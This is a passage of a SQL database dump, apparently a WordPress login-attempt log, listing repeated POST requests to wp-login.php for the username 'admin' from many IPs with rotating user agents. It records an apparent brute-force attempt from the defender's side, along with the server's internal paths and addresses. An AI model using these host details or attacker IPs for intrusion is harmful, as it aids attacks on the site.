00:00:00'),(95435,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36662\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.191\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746938700.4164569;s:12:\"REQUEST_TIME\";i:1746938700;}}','199.188.200.191',0,'2025-05-11 10:15:02','1970-01-01 00:00:00'),(95436,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42924\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746939432.134201;s:12:\"REQUEST_TIME\";i:1746939432;}}','198.54.114.112',0,'2025-05-11 10:27:13','1970-01-01 00:00:00'),(95437,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34942\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746939801.7858169;s:12:\"REQUEST_TIME\";i:1746939801;}}','198.54.114.67',0,'2025-05-11 10:33:23','1970-01-01 00:00:00'),(95438,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46336\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746940164.7272141;s:12:\"REQUEST_TIME\";i:1746940164;}}','103.191.76.181',0,'2025-05-11 10:39:26','1970-01-01 00:00:00'),(95439,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35620\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746940532.788692;s:12:\"REQUEST_TIME\";i:1746940532;}}','68.65.120.171',0,'2025-05-11 10:45:34','1970-01-01 00:00:00'),(95440,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40338\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746940900.378423;s:12:\"REQUEST_TIME\";i:1746940900;}}','162.213.251.71',0,'2025-05-11 10:51:42','1970-01-01 00:00:00'),(95441,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44212\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.45\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746941268.5778511;s:12:\"REQUEST_TIME\";i:1746941268;}}','198.54.114.45',0,'2025-05-11 10:57:50','1970-01-01 00:00:00'),(95442,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54934\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.205.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746941639.2577291;s:12:\"REQUEST_TIME\";i:1746941639;}}','199.188.205.8',0,'2025-05-11 11:04:01','1970-01-01 00:00:00'),(95443,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"26038\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746942009.8876159;s:12:\"REQUEST_TIME\";i:1746942009;}}','91.151.95.70',0,'2025-05-11 11:10:11','1970-01-01 00:00:00'),(95444,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42132\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.160\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746942382.0178139;s:12:\"REQUEST_TIME\";i:1746942382;}}','162.0.232.160',0,'2025-05-11 11:16:23','1970-01-01 00:00:00'),(95445,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46426\";s:11:\"REMOTE_ADDR\";s:15:\"186.209.113.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=